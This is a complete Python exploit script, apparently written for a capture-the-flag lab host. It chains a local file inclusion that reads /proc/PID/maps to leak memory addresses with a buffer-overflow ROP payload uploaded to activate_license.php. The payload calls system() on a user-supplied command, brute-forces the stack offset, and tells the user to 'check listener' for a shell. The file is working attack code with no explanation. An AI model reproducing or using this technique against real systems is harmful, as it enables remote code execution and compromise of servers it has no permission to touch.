first_exploit.py

#!/usr/bin/env python3

import re
import requests
import struct
import signal
import sys
import time


ip = '10.10.11.154'
p64 = lambda n: struct.pack('<Q', n)
signal.signal(signal.SIGINT, lambda *_: print('\n[!] Exiting...') or exit(1))


def get_addresses(pid):
    r = requests.get(f'http://{ip}/index.php?page=/proc/{pid}/maps', allow_redirects=False)
    elf_base_addr = re.findall(r'(.*?)\-.*?/usr/bin/activate_license', r.text)[0]
    glibc_base_addr = re.findall(r'(.*?)\-.*?/usr/lib/x86_64-linux-gnu/libc-2.31.so', r.text)[0]
    stack_addr = re.findall(r'(.*?)\-.*?\[stack\]', r.text)[0]

    return int(elf_base_addr, 16), int(glibc_base_addr, 16), int(stack_addr, 16)


def craft_payload(pid, cmd, stack_offset):
    elf_address, glibc_address, stack_address = get_addresses(pid)

    pop_rdi_ret = elf_address   + 0x0181b
    system      = glibc_address + 0x48e50

    padding = b' ' * 200
    cmd = padding + cmd.encode() + b'\0'

    offset = 520
    junk = b'A' * offset

    payload  = junk
    payload += p64(pop_rdi_ret)
    payload += p64(stack_address + stack_offset)
    payload += p64(system)
    payload += cmd

    return {'licensefile': ('tmp_name', payload)}


def main():
    if len(sys.argv) != 3 and len(sys.argv) != 4:
        print(f'[!] Usage: python3 {sys.argv[0]} <PID> <cmd> [stack offset (hex)]')
        return

    pid, cmd = sys.argv[1], sys.argv[2]

    if len(sys.argv) == 4:
        stack_offset = int(sys.argv[3], 16)
        requests.post(f'http://{ip}/activate_license.php',
                files=craft_payload(pid, cmd, stack_offset))
        print('[+] Sent payload. Check listener')
        return

    print('[+] Starting brute force on stack offset')

    for stack_offset in range(0x21000, 0, -128):
        print(f'[*] Stack offset: {hex(stack_offset)}')
        time.sleep(1)
        requests.post(f'http://{ip}/activate_license.php',
                files=craft_payload(pid, cmd, stack_offset))


if __name__ == '__main__':
    main()